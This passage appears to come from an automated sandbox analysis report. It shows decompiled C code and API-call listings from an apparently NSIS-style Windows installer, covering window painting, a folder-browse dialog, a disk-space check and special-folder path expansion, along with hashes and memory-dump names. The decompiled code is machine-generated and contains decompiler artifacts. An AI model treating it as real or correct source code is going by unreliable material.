                                                                                                                                                                                                                            0x004010d9
                                                                                                                                                                                                                            0x004010e4
                                                                                                                                                                                                                            0x004010ed
                                                                                                                                                                                                                            0x004010ef
                                                                                                                                                                                                                            0x004010ef
                                                                                                                                                                                                                            0x00401100
                                                                                                                                                                                                                            0x00401105
                                                                                                                                                                                                                            0x0040110d
                                                                                                                                                                                                                            0x00401110
                                                                                                                                                                                                                            0x00401112
                                                                                                                                                                                                                            0x00401118
                                                                                                                                                                                                                            0x0040111f
                                                                                                                                                                                                                            0x00401126
                                                                                                                                                                                                                            0x00401130
                                                                                                                                                                                                                            0x00401142
                                                                                                                                                                                                                            0x00401156
                                                                                                                                                                                                                            0x00401160
                                                                                                                                                                                                                            0x00401165
                                                                                                                                                                                                                            0x00401165
                                                                                                                                                                                                                            0x00401110
                                                                                                                                                                                                                            0x0040116e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401178
                                                                                                                                                                                                                            0x00401010
                                                                                                                                                                                                                            0x00401013
                                                                                                                                                                                                                            0x00401015
                                                                                                                                                                                                                            0x0040101f
                                                                                                                                                                                                                            0x0040101f
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                            • FillRect.USER32 ref: 004010E4
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                            • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                                                                                                                            • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720; // 0x68b77c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                                                                                                                                                            0x00404ab5
                                                                                                                                                                                                                            0x00404abb
                                                                                                                                                                                                                            0x00404ac1
                                                                                                                                                                                                                            0x00404ace
                                                                                                                                                                                                                            0x00404adc
                                                                                                                                                                                                                            0x00404adf
                                                                                                                                                                                                                            0x00404ae7
                                                                                                                                                                                                                            0x00404aed
                                                                                                                                                                                                                            0x00404aed
                                                                                                                                                                                                                            0x00404af9
                                                                                                                                                                                                                            0x00404afc
                                                                                                                                                                                                                            0x00404b6a
                                                                                                                                                                                                                            0x00404b71
                                                                                                                                                                                                                            0x00404c48
                                                                                                                                                                                                                            0x00404c4f
                                                                                                                                                                                                                            0x00404c5e
                                                                                                                                                                                                                            0x00404c5e
                                                                                                                                                                                                                            0x00404c62
                                                                                                                                                                                                                            0x00404c6c
                                                                                                                                                                                                                            0x00404c79
                                                                                                                                                                                                                            0x00404c7b
                                                                                                                                                                                                                            0x00404c7b
                                                                                                                                                                                                                            0x00404c89
                                                                                                                                                                                                                            0x00404c90
                                                                                                                                                                                                                            0x00404c97
                                                                                                                                                                                                                            0x00404c9a
                                                                                                                                                                                                                            0x00404cd6
                                                                                                                                                                                                                            0x00404cd8
                                                                                                                                                                                                                            0x00404cde
                                                                                                                                                                                                                            0x00404ce3
                                                                                                                                                                                                                            0x00404ce7
                                                                                                                                                                                                                            0x00404ce9
                                                                                                                                                                                                                            0x00404ce9
                                                                                                                                                                                                                            0x00404d05
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404d07
                                                                                                                                                                                                                            0x00404d0a
                                                                                                                                                                                                                            0x00404d18
                                                                                                                                                                                                                            0x00404d1e
                                                                                                                                                                                                                            0x00404d1f
                                                                                                                                                                                                                            0x00404d22
                                                                                                                                                                                                                            0x00404d25
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404d25
                                                                                                                                                                                                                            0x00404c9c
                                                                                                                                                                                                                            0x00404c9e
                                                                                                                                                                                                                            0x00404ca2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404ca4
                                                                                                                                                                                                                            0x00404ca4
                                                                                                                                                                                                                            0x00404cb1
                                                                                                                                                                                                                            0x00404cb6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404cba
                                                                                                                                                                                                                            0x00404cbc
                                                                                                                                                                                                                            0x00404cbc
                                                                                                                                                                                                                            0x00404cc5
                                                                                                                                                                                                                            0x00404cc7
                                                                                                                                                                                                                            0x00404ccc
                                                                                                                                                                                                                            0x00404ccf
                                                                                                                                                                                                                            0x00404cd4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404cd4
                                                                                                                                                                                                                            0x00404d31
                                                                                                                                                                                                                            0x00404d3b
                                                                                                                                                                                                                            0x00404d3e
                                                                                                                                                                                                                            0x00404d41
                                                                                                                                                                                                                            0x00404d48
                                                                                                                                                                                                                            0x00404d48
                                                                                                                                                                                                                            0x00404d4a
                                                                                                                                                                                                                            0x00404d4a
                                                                                                                                                                                                                            0x00404d4f
                                                                                                                                                                                                                            0x00404d51
                                                                                                                                                                                                                            0x00404d59
                                                                                                                                                                                                                            0x00404d60
                                                                                                                                                                                                                            0x00404d62
                                                                                                                                                                                                                            0x00404d6d
                                                                                                                                                                                                                            0x00404d6d
                                                                                                                                                                                                                            0x00404d62
                                                                                                                                                                                                                            0x00404d7d
                                                                                                                                                                                                                            0x00404d87
                                                                                                                                                                                                                            0x00404d8f
                                                                                                                                                                                                                            0x00404daa
                                                                                                                                                                                                                            0x00404d91
                                                                                                                                                                                                                            0x00404d9a
                                                                                                                                                                                                                            0x00404d9a
                                                                                                                                                                                                                            0x00404d8f
                                                                                                                                                                                                                            0x00404daf
                                                                                                                                                                                                                            0x00404db4
                                                                                                                                                                                                                            0x00404db9
                                                                                                                                                                                                                            0x00404dc2
                                                                                                                                                                                                                            0x00404dc2
                                                                                                                                                                                                                            0x00404dcb
                                                                                                                                                                                                                            0x00404dcd
                                                                                                                                                                                                                            0x00404dcd
                                                                                                                                                                                                                            0x00404dd9
                                                                                                                                                                                                                            0x00404de1
                                                                                                                                                                                                                            0x00404deb
                                                                                                                                                                                                                            0x00404deb
                                                                                                                                                                                                                            0x00404df0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404df0
                                                                                                                                                                                                                            0x00404c9a
                                                                                                                                                                                                                            0x00404c51
                                                                                                                                                                                                                            0x00404c58
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404c58
                                                                                                                                                                                                                            0x00404b77
                                                                                                                                                                                                                            0x00404b80
                                                                                                                                                                                                                            0x00404b9a
                                                                                                                                                                                                                            0x00404b9f
                                                                                                                                                                                                                            0x00404ba9
                                                                                                                                                                                                                            0x00404bb0
                                                                                                                                                                                                                            0x00404bbc
                                                                                                                                                                                                                            0x00404bbf
                                                                                                                                                                                                                            0x00404bc2
                                                                                                                                                                                                                            0x00404bc9
                                                                                                                                                                                                                            0x00404bd1
                                                                                                                                                                                                                            0x00404bd4
                                                                                                                                                                                                                            0x00404bd8
                                                                                                                                                                                                                            0x00404bdf
                                                                                                                                                                                                                            0x00404be7
                                                                                                                                                                                                                            0x00404c41
                                                                                                                                                                                                                            0x00404be9
                                                                                                                                                                                                                            0x00404bea
                                                                                                                                                                                                                            0x00404bf1
                                                                                                                                                                                                                            0x00404bfb
                                                                                                                                                                                                                            0x00404c03
                                                                                                                                                                                                                            0x00404c10
                                                                                                                                                                                                                            0x00404c24
                                                                                                                                                                                                                            0x00404c28
                                                                                                                                                                                                                            0x00404c28
                                                                                                                                                                                                                            0x00404c24
                                                                                                                                                                                                                            0x00404c2d
                                                                                                                                                                                                                            0x00404c3a
                                                                                                                                                                                                                            0x00404c3a
                                                                                                                                                                                                                            0x00404be7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404b9f
                                                                                                                                                                                                                            0x00404b8d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404b93
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404afe
                                                                                                                                                                                                                            0x00404b0b
                                                                                                                                                                                                                            0x00404b14
                                                                                                                                                                                                                            0x00404b21
                                                                                                                                                                                                                            0x00404b21
                                                                                                                                                                                                                            0x00404b28
                                                                                                                                                                                                                            0x00404b2e
                                                                                                                                                                                                                            0x00404b37
                                                                                                                                                                                                                            0x00404b3a
                                                                                                                                                                                                                            0x00404b3d
                                                                                                                                                                                                                            0x00404b45
                                                                                                                                                                                                                            0x00404b48
                                                                                                                                                                                                                            0x00404b4b
                                                                                                                                                                                                                            0x00404b51
                                                                                                                                                                                                                            0x00404b58
                                                                                                                                                                                                                            0x00404b5f
                                                                                                                                                                                                                            0x00404df6
                                                                                                                                                                                                                            0x00404e08
                                                                                                                                                                                                                            0x00404b65
                                                                                                                                                                                                                            0x00404b68
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404b68
                                                                                                                                                                                                                            0x00404b5f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404B04
                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                                                                                                                                                                                            • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                                                                                                                                                                              • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                                                                                                                                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                                                                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                                                                                                                                              • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                                                                                                                                              • Part of subcall function 004068EF: CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                                                                                                                                              • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                                                                                                                                              • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                                                                                                                                              • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp$Call$H7B
                                                                                                                                                                                                                            • API String ID: 2624150263-521110912
                                                                                                                                                                                                                            • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                                                                                                                                                            • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004066A5 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                                                                                                                                                            0x004066a5
                                                                                                                                                                                                                            0x004066a5
                                                                                                                                                                                                                            0x004066a5
                                                                                                                                                                                                                            0x004066ab
                                                                                                                                                                                                                            0x004066b0
                                                                                                                                                                                                                            0x004066c1
                                                                                                                                                                                                                            0x004066c1
                                                                                                                                                                                                                            0x004066c9
                                                                                                                                                                                                                            0x004066ca
                                                                                                                                                                                                                            0x004066cb
                                                                                                                                                                                                                            0x004066cc
                                                                                                                                                                                                                            0x004066cf
                                                                                                                                                                                                                            0x004066d7
                                                                                                                                                                                                                            0x004066d9
                                                                                                                                                                                                                            0x004066ea
                                                                                                                                                                                                                            0x004066ed
                                                                                                                                                                                                                            0x004066ed
                                                                                                                                                                                                                            0x004066f1
                                                                                                                                                                                                                            0x004066f7
                                                                                                                                                                                                                            0x004066fa
                                                                                                                                                                                                                            0x004068d5
                                                                                                                                                                                                                            0x004068d5
                                                                                                                                                                                                                            0x004068e0
                                                                                                                                                                                                                            0x004068ec
                                                                                                                                                                                                                            0x004068ec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406700
                                                                                                                                                                                                                            0x00406705
                                                                                                                                                                                                                            0x0040671a
                                                                                                                                                                                                                            0x0040671b
                                                                                                                                                                                                                            0x00406721
                                                                                                                                                                                                                            0x004068b3
                                                                                                                                                                                                                            0x004068c1
                                                                                                                                                                                                                            0x004068c4
                                                                                                                                                                                                                            0x004068c4
                                                                                                                                                                                                                            0x004068b5
                                                                                                                                                                                                                            0x004068b8
                                                                                                                                                                                                                            0x004068bb
                                                                                                                                                                                                                            0x004068bd
                                                                                                                                                                                                                            0x004068bd
                                                                                                                                                                                                                            0x004068c6
                                                                                                                                                                                                                            0x004068c6
                                                                                                                                                                                                                            0x004068cc
                                                                                                                                                                                                                            0x004068cf
                                                                                                                                                                                                                            0x00406702
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406702
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004068cf
                                                                                                                                                                                                                            0x00406727
                                                                                                                                                                                                                            0x0040672a
                                                                                                                                                                                                                            0x00406739
